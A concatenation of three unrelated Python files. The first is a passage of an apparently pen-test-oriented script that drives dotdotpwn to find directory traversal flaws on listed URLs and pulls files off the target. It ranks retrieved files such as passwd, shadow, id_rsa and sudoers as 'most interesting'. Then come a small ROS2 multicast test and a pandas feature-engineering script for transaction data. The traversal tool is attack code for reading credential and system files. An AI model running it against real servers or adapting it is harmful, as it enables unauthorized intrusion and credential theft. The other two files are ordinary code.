r = requests.get(url)
if (r.status_code == 200):
return r.text, r.status_code
else:
return False, r.status_code
except:
raise
def sortRetrievedFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
sizes = []
moveTheseFiles = []
for item in files:
if os.path.isfile(item):
sizes.append(os.path.getsize(item))
for size in sizes:
if sizes.count(size) > 3:
moveTheseFiles.append(size)
for sizeOfitems in moveTheseFiles:
try:
os.makedirs(str(sizeOfitems))
except:
pass
#print "Warning: Dir already exists"
for items in files:
if os.path.getsize(items) == sizeOfitems:
newpath = "./%s/%s" % (str(sizeOfitems),items)
os.rename(items,newpath)
files.remove(items)
def sortMostInterestingFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
mostInterestingFiles = "passwd","shadow","id_rsa","id_dsa","passdb","samba","ssh","authorized","sudoers","history"
try:
os.makedirs("mostInteresting")
except:
pass
for item in files:
for name in mostInterestingFiles:
if (name in item):
new = "./mostInteresting/%s" % (item)
move(item,new)
break
def sortEverythingElse():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
everythingElse = "etc","var","proc"
try:
for folder in everythingElse:
os.makedirs(folder)
except:
pass
for item in files:
for name in everythingElse:
if (os.path.isdir(item)):
break
if (name in item):
new = "./%s/%s" % (name,item)
move(item,new)
break
##1, grab port
##2, output file cannot have "/" in filename
##3, grab base url, http module doesn't like http://
##4, file has \n causing errors in query, strip those
def parseURL(url):
tmp = url.split(":")
if (len(tmp) == 3):
tmp2 = tmp[2]
port = tmp2.split("/")[0]
if (len(tmp) <= 2):
if ("https" == tmp[0]):
port = "443"
elif ("http" == tmp[0]):
port = "80"
if (len(tmp) > 3): #this should never happen
port = "80"
try:
resultsOut = url.split("/")[2] + url.split("/")[3]
except:
raise
tmp4 = url.split(":")[1]
baseURL = tmp4[2:]
if ("\n" in url):
URL = url[:-1]
else:
URL = url
return port, resultsOut, baseURL, URL
def setDotPwnOptions():
if (args.os == "unix"):
konfirmString = '"root:"'
if (args.os == "windows"):
konfirmString = '"[fonts]"'
return konfirmString
#will return values to build a string like base+page+pre+path+encodedsplit+userrequestfile+suffix
#let base = IP:Port/
#let vulnPage = page.ext[/|=]
def analyzeVuln(vulnar):
final = []
for vuln in vulnar:
vulnProto = ""
vulnURL = []
vulnBase = ""
vulnPage = ""
vulnStringPrefix = ""
vulnStringSuffix = ""
encodedSplit = ""
tmp = vuln[17:len(vuln)-14] #vuln is entire line from [*] testing url... to <- VULNERABLE
vulnURL.append(tmp)
if ("http://" in tmp):
vulnProto = "http://"
vulnBase = tmp.split("http://")[1]
if ("https://" in tmp):
vulnProto = "https://"
vulnBase = tmp.split("https://")[1]
vulnPagetmp = vulnBase.split("/",1)[1]
vulnBase = vulnBase.split("/",1)[0]
vulnBase = vulnBase + "/"
#print "DEBUG: vulnBase %s" % vulnBase
#print "DEBUG: vulnPagetmp: %s" % vulnPagetmp
if ("=" in vulnPagetmp): #vulnPage with param, ie 'index.php?arg='
vulnPage = vulnPagetmp.split("=",1)[0]
vulnPage = vulnPage + "="
vulnStringPrefixtmp = vulnPagetmp.split("=",1)[1]
else: #vulnPage with no param, ie index.php/
vulnPage = vulnPagetmp.split("/",2)[0]
vulnPage = vulnPage + "/"
#print "DEBUG: vulnPagetmpsplit %s" % vulnPagetmp.split("/",2)
vulnStringPrefixtmp = vulnPagetmp.split("/",2)[len(vulnPagetmp.split("/",2))-1]
#print "DEBUG: vulnStringPrefixtmp: %s" %vulnStringPrefixtmp
if (args.os == 'unix'): #looking for passwd and issue, user specified file not available yet
vulnStringPrefix = vulnStringPrefixtmp.split("etc")[0]
encodedSplittmp = vulnStringPrefixtmp.split("etc")[1]
if ("passwd" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("passwd")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if ("issue" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("issue")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if (args.os == 'windows'):
print "Error: Windows not supported for file exfil yet"
raise
vals = vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit
print "DEBUG: Make sure these values are correct: vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit"
print vals
final.append(vals)
return final
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Rough script to handle discovery of and exfiltration of data through directory traversal. Recommend invoke with: dirTrav <URLs> <os> -sr')
parser.add_argument('-d', '--scan-depth', type=int, action="store", dest="depth", default=10, help="depth of ../../../ to extend to, default of 10")
parser.add_argument('-e', '--extensions', type=str, action="store", dest="extensions", default='".html"', help='extensions appended at the end of each fuzz string (e.g. \'".php", ".jpg", ".inc"\' Entire list needs to be encased in single quotes. Each extension needs to be in double quotes. There needs to be a comma and a space between each extension)')
parser.add_argument('file', type=str, help="file with URLs to fuzz")
parser.add_argument('os', type=str, action="store", help="OS greatly helps reduce false positives and reduces scan time. 'windows' or 'unix'")
parser.add_argument('-s', '--scan', action="store_true", dest="scan", default="true", help="scan the target for directory traversal")
parser.add_argument('-sr', '--scan-and-retrieve', nargs='?', const='true', default='false', dest="scan_and_retrieve", help="scan and retrieve files if a directory traversal is found")
parser.add_argument('-x', '--xfil-files', type=str, action="store", dest="xfil_files", default="/root/lists/Personal/DirTrav/linux_all.txt", help="list of files to retrieve if a directory traversal vulnerability is found. Default is linux_all.txt.")
args = parser.parse_args()
#print args
vuln = []
inputFileName = "%s" % args.file
if (args.os == "windows"):
if ("linux_all.txt" in args.xfil_files):
print "Error: Will not retrieve linux files from Windows. Set os to Linux or pass a file with Windows files to -x"
raise
if (args.os == "linux"):
if ("windows_all.txt" in args.xfil_files):
print "Error: Will not retrieve windows files from Linux. Set os to Windows or pass a file with Linux files to -x"
raise
if (args.scan):
try:
inputFile = open(inputFileName,'r')
jobs = []
print "INFO: Starting Dotdotpwn"
for URL in inputFile:
if ("\n" in URL):
URL = URL[:-1]
if (URL[0] != "#"):
#print "Processing %s" % URL
p = multiprocessing.Process(target=dotPwn, args=(URL,))
jobs.append(p)
p.start()
inputFile.close()
except:
raise
|
test_api.py
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from ros2multicast.api import receive
from ros2multicast.api import send
def test_api():
sent_data = b'test_api'
received_data = None
def target():
nonlocal received_data
received_data, _ = receive(timeout=1.0)
t = threading.Thread(target=target)
t.start()
time.sleep(0.1)
send(sent_data)
t.join()
assert sent_data == received_data
|
generate_main.py
|
# %%
import os
import pandas as pd
import numpy as np
import threading
import time
base_dir = os.getcwd()
# %%
# 初始化表头
header = ['user', 'n_op', 'n_trans', 'op_type_0', 'op_type_1', 'op_type_2', 'op_type_3', 'op_type_4', 'op_type_5',
'op_type_6', 'op_type_7', 'op_type_8', 'op_type_9', 'op_type_perc', 'op_type_std', 'op_type_n', 'op_mode_0',
'op_mode_1', 'op_mode_2', 'op_mode_3', 'op_mode_4', 'op_mode_5', 'op_mode_6', 'op_mode_7', 'op_mode_8',
'op_mode_9', 'op_mode_perc', 'op_mode_std', 'op_mode_n', 'op_device_perc', 'op_device_std',
'op_device_nan_perc', 'op_device_n', 'op_ip_perc', 'op_ip_std', 'op_ip_nan_perc', 'op_ip_n', 'op_net_type_0',
'op_net_type_1', 'op_net_type_2', 'op_net_type_3', 'op_net_type_perc', 'op_net_type_std',
'op_net_type_nan_perc', 'op_channel_0', 'op_channel_1', 'op_channel_2', 'op_channel_3', 'op_channel_4',
'op_channel_perc', 'op_channel_std', 'op_channel_n', 'op_ip_3_perc', 'op_ip_3_std', 'op_ip_3_nan_perc',
'op_ip_3_n', 'op_ip_3_ch_freq', 'op_ip_48h_n', 'op_device_48h_n',
'op_48h_n', 'trans_platform_0', 'trans_platform_1', 'trans_platform_2', 'trans_platform_3',
'trans_platform_4', 'trans_platform_5', 'trans_platform_perc', 'trans_platform_std', 'trans_platform_n',
'trans_tunnel_in_0', 'trans_tunnel_in_1', 'trans_tunnel_in_2', 'trans_tunnel_in_3', 'trans_tunnel_in_4',
'trans_tunnel_in_5', 'trans_tunnel_in_perc', 'trans_tunnel_in_std', 'trans_tunnel_in_n',
'trans_tunnel_in_nan_perc', 'trans_tunnel_out_0', 'trans_tunnel_out_1', 'trans_tunnel_out_2',
'trans_tunnel_out_3', 'trans_tunnel_out_perc', 'trans_tunnel_out_std', 'trans_tunnel_n', 'trans_amount_max',
'trans_amount_avg', 'trans_amount_std', 'trans_type1_0', 'trans_type1_1', 'trans_type1_2', 'trans_type1_3',
'trans_type1_4', 'trans_type1_perc', 'trans_type1_std', 'trans_ip_perc', 'trans_ip_std', 'trans_ip_nan_perc',
'trans_ip_n', 'trans_type2_0', 'trans_type2_1', 'trans_type2_2', 'trans_type2_3', 'trans_type2_4',
'trans_type2_perc', 'trans_type2_std', 'trans_ip_3_perc', 'trans_ip_3_std', 'trans_ip_3_nan_perc',
'trans_ip_3_n', 'trans_ip_3_ch_freq',
'trans_amount_48h_n', 'trans_48h_n', 'trans_platform_48h_n', 'trans_ip_48h_n']
print(len(header))
# %%
feature_train = pd.DataFrame(columns=header)
feature_test_a = pd.DataFrame(columns=header)
feature_test_b = pd.DataFrame(columns=header)
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
train_op_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_op.csv')
train_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_trans.csv')
test_a_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_a_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_op.csv')
test_a_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_trans.csv')
test_b_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_base.csv')
test_b_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_op.csv')
test_b_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_trans.csv')
n_train = len(train_base_df)
n_test_a = len(test_a_base_df)
n_test_b = len(test_b_base_df)
# %%
# load encoder
op_type = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_type.csv')
mp_op_type = {}
for col in op_type.columns.values:
mp_op_type[col] = op_type[col].values
op_mode = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_mode.csv')
mp_op_mode = {}
for col in op_mode.columns.values:
mp_op_mode[col] = op_mode[col].values
net_type = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_net_type.csv')
mp_net_type = {}
for col in net_type.columns.values:
mp_net_type[col] = net_type[col].values
channel = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_channel.csv')
mp_channel = {}
for col in channel.columns.values:
mp_channel[col] = channel[col].values
platform = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_platform.csv')
mp_platform = {}
for col in platform.columns.values:
mp_platform[col] = platform[col].values
tunnel_in = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_tunnel_in.csv')
mp_tunnel_in = {}
for col in tunnel_in.columns.values:
mp_tunnel_in[col] = tunnel_in[col].values
tunnel_out = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_tunnel_out.csv')
mp_tunnel_out = {}
for col in tunnel_out.columns.values:
mp_tunnel_out[col] = tunnel_out[col].values
type1 = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_type1.csv')
mp_type1 = {}
for col in type1.columns.values:
mp_type1[col] = type1[col].values
type2 = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_type2.csv')
mp_type2 = {}
for col in type2.columns.values:
mp_type2[col] = type2[col].values
# %%
def process(n, isTrain=True, isA=False):
for i in range(n):
if i % 1000 == 0:
print("train - " if isTrain else "test_a - " if isA else "test_b - ", end='')
print(i)
if isTrain:
cur_user = train_base_df['user'].loc[i]
tr_trans_user = train_trans_df[train_trans_df['user'] == cur_user] # 该用户的trans记录
tr_op_user = train_op_df[train_op_df['user'] == cur_user] # 该用户的op记录
elif isA:
cur_user = test_a_base_df['user'].loc[i]
tr_trans_user = test_a_trans_df[test_a_trans_df['user'] == cur_user] # 该用户的trans记录
tr_op_user = test_a_op_df[test_a_op_df['user'] == cur_user] # 该用户的op记录
else:
cur_user = test_b_base_df['user'].loc[i]
tr_trans_user = test_b_trans_df[test_b_trans_df['user'] == cur_user] # 该用户的trans记录
tr_op_user = test_b_op_df[test_b_op_df['user'] == cur_user] # 该用户的op记录
n_tr_trans_user = len(tr_trans_user) # 该用户的trans记录条数
n_tr_op_user = len(tr_op_user) # 该用户的op记录条数
line = [cur_user, n_tr_op_user, n_tr_trans_user] # 一行,即当前用户的所有二次特征
if n_tr_op_user > 0:
### op_type
mode_op_type = tr_op_user['op_type'].mode()[0]
code = mp_op_type[mode_op_type]
line.extend(code)
line.append(sum(tr_op_user['op_type'].apply(lambda x: 1 if x == mode_op_type else 0)) / n_tr_op_user)
s = tr_op_user['op_type'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### op_mode
mode_op_mode = tr_op_user['op_mode'].mode()[0]
code = mp_op_mode[mode_op_mode]
line.extend(code)
line.append(sum(tr_op_user['op_mode'].apply(lambda x: 1 if x == mode_op_mode else 0)) / n_tr_op_user)
s = tr_op_user['op_mode'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### op_device
mode_op_device = tr_op_user['op_device'].mode()[0]
line.append(sum(tr_op_user['op_device'].apply(lambda x: 1 if x == mode_op_device else 0)) / n_tr_op_user)
s = tr_op_user['op_device'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['op_device'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### op_ip
mode_op_ip = tr_op_user['ip'].mode()[0]
line.append(sum(tr_op_user['ip'].apply(lambda x: 1 if x == mode_op_ip else 0)) / n_tr_op_user)
s = tr_op_user['ip'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['ip'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['ip'].apply(lambda x: 1 if x == 'ip_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### op_net_type
mode_op_net_type = tr_op_user['net_type'].mode()[0]
code = mp_net_type[mode_op_net_type]
line.extend(code)
line.append(sum(tr_op_user['net_type'].apply(lambda x: 1 if x == mode_op_net_type else 0)) / n_tr_op_user)
s = tr_op_user['net_type'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['net_type'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user)
### channel
mode_op_channel = tr_op_user['channel'].mode()[0]
code = mp_channel[mode_op_channel]
line.extend(code)
line.append(sum(tr_op_user['channel'].apply(lambda x: 1 if x == mode_op_channel else 0)) / n_tr_op_user)
s = tr_op_user['channel'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### ip_3
mode_op_ip_3 = tr_op_user['ip_3'].mode()[0]
line.append(sum(tr_op_user['ip_3'].apply(lambda x: 1 if x == mode_op_ip_3 else 0)) / n_tr_op_user)
s = tr_op_user['ip_3'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['ip_3'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['ip_3'].apply(lambda x: 1 if x == 'ip_3_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### 对tm_diff排序
tr_op_user.sort_values('tm_diff', inplace=True)
cnt = 0
l = tr_op_user['ip_3'].values
pre = l[0]
for j in range(1, n_tr_op_user):
if l[j] != pre:
pre = l[j]
cnt += 1
line.append(cnt)
### 48h最高ip种类数量、最高的op_device种类数量、最高的op记录次数
tr_op_tm_max = tr_op_user['tm_diff'].values.max()
tr_op_tm_min = tr_op_user['tm_diff'].values.min()
gap = 48 * 3600
start = tr_op_tm_min
end = start + gap
max_48h_ip_n = 0
max_48h_op_device_n = 0
max_48h_op_n = 0
while start <= tr_op_tm_max:
gap_df = tr_op_user[(start <= tr_op_user['tm_diff']) & (tr_op_user['tm_diff'] < end)]
max_48h_ip_n = max(max_48h_ip_n, gap_df['ip'].nunique())
max_48h_op_device_n = max(max_48h_op_device_n, gap_df['op_device'].nunique())
max_48h_op_n = max(max_48h_op_n, len(gap_df))
start = end
end += gap
line.extend([max_48h_ip_n, max_48h_op_device_n, max_48h_op_n])
else:
line.extend([-1] * 57)
if n_tr_trans_user > 0:
### platform
mode_trans_platform = tr_trans_user['platform'].mode()[0]
code = mp_platform[mode_trans_platform]
line.extend(code)
line.append(
sum(tr_trans_user['platform'].apply(lambda x: 1 if x == mode_trans_platform else 0)) / n_tr_trans_user)
s = tr_trans_user['platform'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### tunnel_in
mode_trans_tunnel_in = tr_trans_user['tunnel_in'].mode()[0]
code = mp_tunnel_in[mode_trans_tunnel_in]
line.extend(code)
line.append(sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == mode_trans_tunnel_in else 0)) / n_tr_trans_user)
s = tr_trans_user['tunnel_in'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
# line.append(tr_trans_user['tunnel_in'].isnull().sum() / n_tr_trans_user)
line.append(
sum(tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user)
### tunnel_out
mode_trans_tunnel_out = tr_trans_user['tunnel_out'].mode()[0]
code = mp_tunnel_out[mode_trans_tunnel_out]
line.extend(code)
line.append(sum(
tr_trans_user['tunnel_out'].apply(lambda x: 1 if x == mode_trans_tunnel_out else 0)) / n_tr_trans_user)
s = tr_trans_user['tunnel_out'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### amount
s = tr_trans_user['amount']
line.append(s.values.max())
line.append(s.values.mean())
line.append(s.values.std())
### type1
mode_trans_type1 = tr_trans_user['type1'].mode()[0]
code = mp_type1[mode_trans_type1]
line.extend(code)
line.append(
sum(tr_trans_user['type1'].apply(lambda x: 1 if x == mode_trans_type1 else 0)) / n_tr_trans_user)
s = tr_trans_user['type1'].value_counts()
line.append(np.std(s.values))
### trans_ip
mode_trans_ip = tr_trans_user['ip'].mode()[0]
line.append(sum(tr_trans_user['ip'].apply(lambda x: 1 if x == mode_trans_ip else 0)) / n_tr_trans_user)
s = tr_trans_user['ip'].value_counts()
line.append(np.std(s.values))
# line.append(tr_trans_user['ip'].isnull().sum() / n_tr_trans_user)
line.append(sum(tr_trans_user['ip'].apply(lambda x: 1 if x == 'ip_nan' else 0)) / n_tr_trans_user)
line.append(len(s))
### type2
mode_trans_type2 = tr_trans_user['type2'].mode()[0]
code = mp_type2[mode_trans_type2]
line.extend(code)
line.append(
sum(tr_trans_user['type2'].apply(lambda x: 1 if x == mode_trans_type2 else 0)) / n_tr_trans_user)
s = tr_trans_user['type2'].value_counts()
line.append(np.std(s.values))
### trans_ip_3
mode_trans_ip_3 = tr_trans_user['ip_3'].mode()[0]
line.append(sum(tr_trans_user['ip_3'].apply(lambda x: 1 if x == mode_trans_ip_3 else 0)) / n_tr_trans_user)
s = tr_trans_user['ip'].value_counts()
line.append(np.std(s.values))
line.append(sum(tr_trans_user['ip_3'].apply(lambda x: 1 if x == 'ip_3_nan' else 0)) / n_tr_trans_user)
line.append(len(s))
### 对tm_diff排序
tr_trans_user.sort_values('tm_diff', inplace=True)
cnt = 0
l = tr_trans_user['ip_3'].values
pre = l[0]
for j in range(1, n_tr_trans_user):
if l[j] != pre:
pre = l[j]
cnt += 1
line.append(cnt)
### 48h最高amount总量、最高的trans数量、最高的platform种类数量、最高的ip种类数量
tr_trans_tm_max = tr_trans_user['tm_diff'].values.max()
tr_trans_tm_min = tr_trans_user['tm_diff'].values.min()
gap = 48 * 3600
start = tr_trans_tm_min
end = start + gap
max_48h_sum_amount = 0
max_48h_trans_n = 0
max_48h_platform_n = 0
max_48h_ip_n = 0
while start <= tr_trans_tm_max:
gap_df = tr_trans_user[(start <= tr_trans_user['tm_diff']) & (tr_trans_user['tm_diff'] < end)]
max_48h_sum_amount = max(max_48h_sum_amount, gap_df['amount'].values.sum())
max_48h_trans_n = max(max_48h_trans_n, len(gap_df))
max_48h_platform_n = max(max_48h_platform_n, gap_df['platform'].nunique())
max_48h_ip_n = max(max_48h_ip_n, gap_df['ip'].nunique())
start = end
end += gap
line.extend([max_48h_sum_amount, max_48h_trans_n, max_48h_platform_n, max_48h_ip_n])
else:
line.extend([-1] * 56)
# print(len(line))
### 填入feature矩阵
if isTrain:
feature_train.loc[len(feature_train)] = line
elif isA:
feature_test_a.loc[len(feature_test_a)] = line
else:
feature_test_b.loc[len(feature_test_b)] = line
# 存
if isTrain:
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
elif isA:
feature_test_a.to_csv(base_dir + '/dataset/dataset2/testset/feature_test_a.csv', index=False)
else:
feature_test_b.to_csv(base_dir + '/dataset/dataset2/testset/feature_test_b.csv', index=False)
# %%
process(n_train, isTrain=True)
process(n_test_a, isTrain=False, isA=True)
process(n_test_b, isTrain=False, isA=False)
# %%
# 多线程
def process_threaded(n_train, n_test_a, n_test_b):
def process1():
process(n_train, isTrain=True)
def process2():
process(n_test_a, isTrain=False, isA=True)
def process3():
process(n_test_b, isTrain=False, isA=False)
t1 = threading.Thread(target=process1)
t1.start()
t2 = threading.Thread(target=process2)
t2.start()
t3 = threading.Thread(target=process3)
t3.start()
# %%
process_threaded(n_train, n_test_a, n_test_b)
# %%
# 并入主矩阵
### 以下l六行可以不跑
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test_a = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test_a.csv')
feature_test_b = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test_b.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
test_a_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_b_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_base.csv')
feature_train = feature_train.drop(labels='user', axis=1)
feature_test_a = feature_test_a.drop(labels='user', axis=1)
feature_test_b = feature_test_b.drop(labels='user', axis=1)
train_base_df = train_base_df.join(feature_train)
test_a_base_df = test_a_base_df.join(feature_test_a)
test_b_base_df = test_b_base_df.join(feature_test_b)
train_base_df.to_csv(base_dir + '/dataset/dataset2/trainset/train_main.csv', index=False)
test_a_base_df.to_csv(base_dir + '/dataset/dataset2/testset/test_a_main.csv', index=False)
test_b_base_df.to_csv(base_dir + '/dataset/dataset2/testset/test_b_main.csv', index=False)
# %%
# #######################以下为试水专用########################### #
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv')
feature_train = feature_train.drop(labels=['op_freq', 'op_ip_freq', 'op_ip_3_freq', 'trans_freq', 'trans_amount_freq',
'trans_ip_freq', 'trans_ip_3_freq'], axis=1)
feature_test = feature_test.drop(labels=['op_freq', 'op_ip_freq', 'op_ip_3_freq', 'trans_freq', 'trans_amount_freq',
'trans_ip_freq', 'trans_ip_3_freq'], axis=1)
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
feature_test.to_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv', index=False)
# %%
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
train_op_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_op.csv')
train_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_trans.csv')
test_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_op.csv')
test_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_trans.csv')
n_train = len(train_base_df)
n_test = len(test_base_df)
for i in range(n_train):
if i % 1000 == 0:
print(i)
cur_user = train_base_df['user'].loc[i]
tr_trans_user = train_trans_df[train_trans_df['user'] == cur_user] # 该用户的trans记录
tr_op_user = train_op_df[train_op_df['user'] == cur_user] # 该用户的op记录
n_tr_trans_user = len(tr_trans_user) # 该用户的trans记录条数
n_tr_op_user = len(tr_op_user) # 该用户的op记录条数
if n_tr_op_user > 0:
feature_train['op_device_nan_perc'].loc[i] = sum(
tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user
feature_train['op_net_type_nan_perc'].loc[i] = sum(
tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user
if n_tr_trans_user > 0:
feature_train['trans_tunnel_in_nan_perc'].loc[i] = sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user
for i in range(n_test):
if i % 1000 == 0:
print(i)
cur_user = test_base_df['user'].loc[i]
tr_trans_user = test_trans_df[test_trans_df['user'] == cur_user] # 该用户的trans记录
tr_op_user = test_op_df[test_op_df['user'] == cur_user] # 该用户的op记录
n_tr_trans_user = len(tr_trans_user) # 该用户的trans记录条数
n_tr_op_user = len(tr_op_user) # 该用户的op记录条数
if n_tr_op_user > 0:
feature_test['op_device_nan_perc'].loc[i] = sum(
tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user
feature_test['op_net_type_nan_perc'].loc[i] = sum(
tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user
if n_tr_trans_user > 0:
feature_test['trans_tunnel_in_nan_perc'].loc[i] = sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
feature_test.to_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv', index=False)
# %%
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
for i in range(len(feature_train)):
if i % 1000 == 0:
print(i)
if feature_train['n_op'].loc[i] == 0:
feature_train.loc[i, ('op_type_0', 'op_type_1', 'op_type_2', 'op_type_3', 'op_type_4', 'op_type_5',
'op_type_6', 'op_type_7', 'op_type_8', 'op_type_9', 'op_type_perc', 'op_type_std',
'op_type_n', 'op_mode_0',
'op_mode_1', 'op_mode_2', 'op_mode_3', 'op_mode_4', 'op_mode_5', 'op_mode_6', 'op_mode_7',
'op_mode_8',
'op_mode_9', 'op_mode_perc', 'op_mode_std', 'op_mode_n', 'op_device_perc',
'op_device_std',
'op_device_nan_perc', 'op_device_n', 'op_ip_perc', 'op_ip_std', 'op_ip_nan_perc',
'op_ip_n', 'op_net_type_0',
'op_net_type_1', 'op_net_type_2', 'op_net_type_3', 'op_net_type_perc', 'op_net_type_std',
'op_net_type_nan_perc', 'op_channel_0', 'op_channel_1', 'op_channel_2', 'op_channel_3',
'op_channel_4',
'op_channel_perc', 'op_channel_std', 'op_channel_n', 'op_ip_3_perc', 'op_ip_3_std',
'op_ip_3_nan_perc',
'op_ip_3_n', 'op_ip_3_ch_freq', 'op_ip_48h_n', 'op_device_48h_n',
'op_48h_n')] = -1
if feature_train['n_trans'].loc[i] == 0:
feature_train.loc[i, ('trans_platform_0', 'trans_platform_1', 'trans_platform_2', 'trans_platform_3',
'trans_platform_4', 'trans_platform_5', 'trans_platform_perc', 'trans_platform_std',
'trans_platform_n',
'trans_tunnel_in_0', 'trans_tunnel_in_1', 'trans_tunnel_in_2', 'trans_tunnel_in_3',
'trans_tunnel_in_4',
'trans_tunnel_in_5', 'trans_tunnel_in_perc', 'trans_tunnel_in_std', 'trans_tunnel_in_n',
'trans_tunnel_in_nan_perc', 'trans_tunnel_out_0', 'trans_tunnel_out_1',
'trans_tunnel_out_2',
'trans_tunnel_out_3', 'trans_tunnel_out_perc', 'trans_tunnel_out_std', 'trans_tunnel_n',
'trans_amount_max',
'trans_amount_avg', 'trans_amount_std', 'trans_type1_0', 'trans_type1_1', 'trans_type1_2',
'trans_type1_3',
'trans_type1_4', 'trans_type1_perc', 'trans_type1_std', 'trans_ip_perc', 'trans_ip_std',
'trans_ip_nan_perc',
'trans_ip_n', 'trans_type2_0', 'trans_type2_1', 'trans_type2_2', 'trans_type2_3',
'trans_type2_4',
'trans_type2_perc', 'trans_type2_std', 'trans_ip_3_perc', 'trans_ip_3_std',
'trans_ip_3_nan_perc',
'trans_ip_3_n', 'trans_ip_3_ch_freq',
'trans_amount_48h_n', 'trans_48h_n', 'trans_platform_48h_n', 'trans_ip_48h_n')] = -1
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
# %%
